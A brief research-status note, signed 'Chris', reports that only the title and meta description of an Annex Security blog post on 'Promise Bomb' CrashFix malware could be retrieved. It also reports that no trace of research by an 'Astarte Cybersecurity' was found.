  • Annex Security “Promise Bomb” blog: The site (annex.security) renders content via JavaScript SPA, preventing full text extraction. Only the title (“Promise Bomb crashes browsers to install malware”) and meta description (“New CrashFix variants use functional security extensions and push notification C2 to selectively crash browsers and deliver malware”) were retrievable. A manual browser visit is recommended to capture full article content.
  • Astarte Cybersecurity CrashFix research: No content found. Extensive searching across domain variations (astartecsecurity.com, astartecyber.com), social media, and general web yielded no results for an entity called “Astarte Cybersecurity.” The organization does not appear to have a public web presence or published security research.


Chris
